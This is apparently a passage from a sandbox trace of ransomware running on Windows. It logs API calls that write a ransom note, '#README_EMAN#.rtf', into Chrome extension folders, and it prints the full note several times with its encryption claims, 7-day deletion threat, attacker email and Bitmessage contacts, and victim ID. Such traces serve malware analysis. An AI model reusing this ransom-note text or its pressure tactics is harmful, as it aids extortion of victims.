th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.522] WriteFile (in: hFile=0x2c8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.522] CloseHandle (hObject=0x2c8) returned 1 [0272.522] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\#readme_eman#.rtf")) returned 0xffffffff [0272.522] GetLastError () returned 0x2 [0272.522] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0272.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.525] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer 